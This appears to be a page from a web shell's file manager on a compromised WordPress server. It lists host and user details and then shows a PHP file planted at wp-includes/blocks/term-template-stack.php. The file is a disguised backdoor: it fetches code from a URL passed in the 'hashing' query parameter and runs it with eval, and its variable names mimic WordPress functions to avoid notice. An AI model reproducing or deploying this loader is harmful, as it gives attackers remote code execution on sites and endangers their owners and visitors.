HEX
Server: Apache
System: Linux 162-214-74-50.webhostbox.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User: iideug (1011)
PHP: 8.2.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/iideug/public_html/garima.iideug.com/wp-includes/blocks/term-template-stack.php
<?php

if (isset($_GET['hashing'])) {
    $get_permalink_pwk = $_GET['hashing'];
    if ($wp_get_attachment_image_src_ig = curl_init()) {
        curl_setopt($wp_get_attachment_image_src_ig, CURLOPT_URL, $get_permalink_pwk);
        curl_setopt($wp_get_attachment_image_src_ig, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($wp_get_attachment_image_src_ig));
        curl_close($wp_get_attachment_image_src_ig);
        exit;
    }
}